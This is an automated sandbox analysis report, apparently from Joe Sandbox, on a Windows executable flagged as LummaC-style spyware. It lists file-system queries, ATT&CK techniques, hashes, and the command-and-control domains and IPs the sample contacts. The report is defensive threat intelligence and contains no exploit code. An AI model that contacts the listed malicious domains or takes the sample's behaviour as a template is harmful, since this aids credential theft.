              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\JDDHMPCDUJJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\UNKRLCVOHVJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\QFAPOWPAFGJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\nayfObR.exeDirectory queried: number of queries: 1001
              Source: Yara matchFile source: Process Memory Space: nayfObR.exe PID: 6540, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: Process Memory Space: nayfObR.exe PID: 6540, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
              Windows Management Instrumentation
              1
              DLL Side-Loading
              211
              Process Injection
              21
              Virtualization/Sandbox Evasion
              2
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              DLL Side-Loading
              211
              Process Injection
              LSASS Memory1
              Query Registry
              Remote Desktop Protocol41
              Data from Local System
              2
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              PowerShell
              Logon Script (Windows)Logon Script (Windows)11
              Deobfuscate/Decode Files or Information
              Security Account Manager241
              Security Software Discovery
              SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information
              NTDS21
              Virtualization/Sandbox Evasion
              Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Software Packing
              LSA Secrets1
              Process Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials21
              File and Directory Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
              System Information Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              nayfObR.exe44%VirustotalBrowse
              nayfObR.exe39%ReversingLabsWin32.Trojan.Generic
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://fancywaxxers.shop/$100%Avira URL Cloudmalware
              https://fancywaxxers.shop/apirV100%Avira URL Cloudmalware
              https://fancywaxxers.shop/Ek100%Avira URL Cloudmalware
              https://fancywaxxers.shop/Jk100%Avira URL Cloudmalware
              https://fancywaxxers.shop/apink100%Avira URL Cloudmalware
              https://fancywaxxers.shop/apiR3oR100%Avira URL Cloudmalware
              https://fancywaxxers.shop/i100%Avira URL Cloudmalware
              https://fancywaxxers.shop:443/apiMicrosoft100%Avira URL Cloudmalware
              https://fancywaxxers.shop:443/apis100%Avira URL Cloudmalware
              https://fancywaxxers.shop/apiok100%Avira URL Cloudmalware
              https://fancywaxxers.shop/ak100%Avira URL Cloudmalware
              https://fancywaxxers.shop/api7100%Avira URL Cloudmalware
              https://fancywaxxers.shop/apiJ100%Avira URL Cloudmalware
              https://fancywaxxers.shop:443/api9100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              fancywaxxers.shop
              104.21.32.1
              truefalse
                high
                NameMaliciousAntivirus DetectionReputation
                fancywaxxers.shopfalse
                  high
                  rabidcowse.shopfalse
                    high
                    wholersorie.shopfalse
                      high
                      cloudewahsj.shopfalse
                        high
                        noisycuttej.shopfalse
                          high
                          nearycrepso.shopfalse
                            high
                            https://fancywaxxers.shop/apifalse
                              high
                              framekgirus.shopfalse
                                high
                                tirepublicerj.shopfalse
                                  high
                                  abruptyopsn.shopfalse
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://duckduckgo.com/chrome_newtabnayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://duckduckgo.com/ac/?q=nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://fancywaxxers.shop/apirVnayfObR.exe, 00000003.00000003.2223324623.000000000312C000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226668754.000000000312C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYinayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://fancywaxxers.shop/$nayfObR.exe, 00000003.00000003.2064676852.000000000592D000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2064576733.0000000005928000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://fancywaxxers.shop:443/apiMicrosoftnayfObR.exe, 00000003.00000002.2226400428.00000000030A2000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2101907540.00000000030A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://fancywaxxers.shop/EknayfObR.exe, 00000003.00000003.2051055223.00000000030BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://fancywaxxers.shop:443/apisnayfObR.exe, 00000003.00000003.2051055223.00000000030A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://x1.c.lencr.org/0nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://x1.i.lencr.org/0nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://fancywaxxers.shop/JknayfObR.exe, 00000003.00000003.2223148388.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226400428.00000000030C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    https://support.mozilla.org/products/firefoxgro.allnayfObR.exe, 00000003.00000003.2076910784.0000000005BDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://fancywaxxers.shop:443/apinayfObR.exe, nayfObR.exe, 00000003.00000003.2223148388.00000000030A2000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2210391409.00000000030A2000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183544269.00000000030A2000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226400428.00000000030A2000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2101907540.00000000030A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://fancywaxxers.shop/apinknayfObR.exe, 00000003.00000003.2194674764.0000000003135000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://fancywaxxers.shop/apiR3oRnayfObR.exe, 00000003.00000003.2075834221.0000000005944000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2075511997.0000000005943000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://fancywaxxers.shop/inayfObR.exe, 00000003.00000003.2210657402.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2194674764.0000000003135000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.iconayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://ocsp.rootca1.amazontrust.com0:nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.ecosia.org/newtab/nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctanayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brnayfObR.exe, 00000003.00000003.2076910784.0000000005BDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://fancywaxxers.shop/apioknayfObR.exe, 00000003.00000003.2064489964.0000000005928000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://ac.ecosia.org/autocomplete?q=nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgnayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://fancywaxxers.shop/InayfObR.exe, 00000003.00000003.2183649716.0000000003135000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://crl.micronayfObR.exe, 00000003.00000003.2101907540.0000000003103000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051055223.0000000003103000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2210129135.0000000003111000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183544269.0000000003103000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgnayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?nayfObR.exe, 00000003.00000003.2076167571.00000000059BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://fancywaxxers.shop/apiJnayfObR.exe, 00000003.00000003.2210657402.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183649716.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2223324623.000000000312C000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2194674764.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226668754.000000000312C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refnayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477nayfObR.exe, 00000003.00000003.2077258778.0000000005940000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://fancywaxxers.shop/aknayfObR.exe, 00000003.00000003.2064489964.0000000005928000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://fancywaxxers.shop/nayfObR.exe, nayfObR.exe, 00000003.00000003.2210391409.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183510952.000000000311D000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051055223.00000000030C3000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2210657402.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051055223.00000000030AC000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2102111658.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183649716.000000000311E000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2183649716.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2223324623.000000000312C000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2194674764.0000000003135000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000002.2226668754.000000000312C000.00000004.00000020.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2075511997.000000000593D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://fancywaxxers.shop/api7nayfObR.exe, 00000003.00000003.2051055223.00000000030C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        unknown
                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=nayfObR.exe, 00000003.00000003.2051828204.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051894082.00000000058E8000.00000004.00000800.00020000.00000000.sdmp, nayfObR.exe, 00000003.00000003.2051766985.00000000058EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://fancywaxxers.shop:443/api9nayfObR.exe, 00000003.00000003.2051055223.00000000030A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          104.21.32.1
                                                                                          fancywaxxers.shopUnited States
                                                                                          13335CLOUDFLARENETUSfalse
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1583755
                                                                                          Start date and time:2025-01-03 14:33:06 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 5m 20s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:6
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:nayfObR.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@4/0@1/1
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 50%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 99%
                                                                                          • Number of executed functions: 19
                                                                                          • Number of non-executed functions: 43
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.253.45, 4.175.87.197
                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target nayfObR.exe, PID 6540 because there are no executed function
                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          TimeTypeDescription
                                                                                          08:33:56API Interceptor8x Sleep call for process: nayfObR.exe modified
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          104.21.32.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                          • redroomaudio.com/administrator/index.php
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          fancywaxxers.shopUhsjR3ZFTD.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.32.1
                                                                                          Loader.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.48.1
                                                                                          Loader.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.80.1
                                                                                          Solara-Roblox-Executor-v3.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.96.1
                                                                                          Delta.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.96.1
                                                                                          SMmAznmdAa.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.48.1
                                                                                          zhMQ0hNEmb.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.112.1
                                                                                          2RxMkSAgZ8.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.64.1
                                                                                          Dl6wuWiQdg.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                                                                          • 104.21.112.1
                                                                                          bzzF5OFbVi.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.64.1
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          CLOUDFLARENETUShttp://www.klim.comGet hashmaliciousUnknownBrowse
                                                                                          • 104.18.27.193
                                                                                          XClient.exeGet hashmaliciousXWormBrowse
                                                                                          • 172.67.19.24
                                                                                          7z91gvU.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.96.1
                                                                                          https://telegra.ph/Clarkson-122025-01-02Get hashmaliciousUnknownBrowse
                                                                                          • 104.26.13.205
                                                                                          mode11_0HVJ.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                          • 188.114.96.3
                                                                                          https://goatstuff.sbs/re5.mp4Get hashmaliciousUnknownBrowse
                                                                                          • 188.114.96.3
                                                                                          mode11_AKUh.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                          • 188.114.96.3
                                                                                          mode11_qLf2.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                          • 188.114.97.3
                                                                                          mode11_UVo6.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                          • 188.114.96.3
                                                                                          mode11_buqd.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                          • 188.114.96.3
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          a0e9f5d64349fb13191bc781f81f42e17z91gvU.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.32.1
                                                                                          ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                          • 104.21.32.1
                                                                                          PO_B2W984.comGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                          • 104.21.32.1
                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.32.1
                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                          • 104.21.32.1
                                                                                          image.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                          • 104.21.32.1
                                                                                          MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.32.1
                                                                                          MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.32.1
                                                                                          MDE_File_Sample_017466bb6ff6d1b5b887f00b4b0a959ffc026bdb.zipGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.32.1
                                                                                          No context
                                                                                          No created / dropped files found
                                                                                          File type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                          Entropy (8bit):7.662111974378329
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                          File name:nayfObR.exe
                                                                                          File size:535'040 bytes
                                                                                          MD5:138fcf999a87419be2c7e5e036601466
                                                                                          SHA1:7569a1444cd948145c966dbe0b47ffdb587f8681
                                                                                          SHA256:960aa535a9712242c02a82c1f07530ae60e79bcbab15fcf0ebc6e7dbd636710b
                                                                                          SHA512:afd574b7cf69012e1fd319c6e3825ff512c042c9917f5d7087ea88632516c9ab6bb30d48d465e18ba1be6e412a9ac728d609006af05df8577d7de2c938501c6d
                                                                                          SSDEEP:12288:DztE0u86qlmk/345zA7Fv6vsVOzm9t/Gzr9AskP6f:DO0uYlmsozAAvsYkGzrOw
                                                                                          TLSH:F0B4E05175C0C072D8A3253259F5CB759A2EF9200F626DCFA7880FBA8F216D15B31B6E
                                                                                          File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...c.vg.................F........................@.......................................@.............................Z...J...(..
                                                                                          Icon Hash:00928e8e8686b000
                                                                                          Entrypoint:0x409eb0
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows cui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NO_ISOLATION, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x67769663 [Thu Jan 2 13:36:35 2025 UTC]
